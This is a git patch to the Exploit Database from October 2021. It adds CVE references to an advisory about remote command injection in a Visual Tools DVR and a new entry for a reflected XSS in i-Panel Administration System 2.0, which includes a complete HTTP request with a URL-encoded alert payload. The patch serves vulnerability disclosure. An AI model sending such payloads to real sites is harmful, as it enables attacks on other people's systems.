From a7f5a626135364abdc6d9d7b2b186673b2d80825 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 16 Oct 2021 05:02:08 +0000 Subject: [PATCH] DB: 2021-10-16 2 changes to exploits/shellcodes i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS) --- exploits/multiple/webapps/50098.txt | 2 ++ exploits/php/webapps/50418.txt | 20 ++++++++++++++++++++ files_exploits.csv | 1 + 3 files changed, 23 insertions(+) create mode 100644 exploits/php/webapps/50418.txt diff --git a/exploits/multiple/webapps/50098.txt b/exploits/multiple/webapps/50098.txt index 2d8462712..e90fef9d1 100644 --- a/exploits/multiple/webapps/50098.txt +++ b/exploits/multiple/webapps/50098.txt @@ -4,6 +4,8 @@ # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. +# CVE: CVE-2021-42071 +# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/ # An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution. diff --git a/exploits/php/webapps/50418.txt b/exploits/php/webapps/50418.txt new file mode 100644 index 000000000..3c0b65f16 --- /dev/null +++ b/exploits/php/webapps/50418.txt @@ -0,0 +1,20 @@ +# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS) +# Date: 04.10.2021 +# Exploit Author: Forster Chiu +# Vendor Homepage: https://www.hkurl.com +# Version: 2.0 +# Tested on: Chrome, Edge and Firefox +# CVE: CVE-2021-41878 +# Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html + +As a proof of concept, an alert box can be generated with the following payload. +Exploit PoC: + +GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1 +Host: Forster +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept-Language: en-gb +Accept-Encoding: gzip, deflate +Connection: close \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 345ae3c1f..114899e8f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44364,3 +44364,4 @@ id,file,description,date,author,type,platform,port 50412,exploits/php/webapps/50412.txt,"Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)",1970-01-01,"Hüseyin Serkan Balkanli",webapps,php, 50413,exploits/multiple/webapps/50413.txt,"Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)",1970-01-01,"Mert Daş",webapps,multiple, 50414,exploits/hardware/webapps/50414.txt,"Sonicwall SonicOS 7.0 - Host Header Injection",1970-01-01,Ramikan,webapps,hardware, +50418,exploits/php/webapps/50418.txt,"i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)",1970-01-01,"Forster Chiu",webapps,php,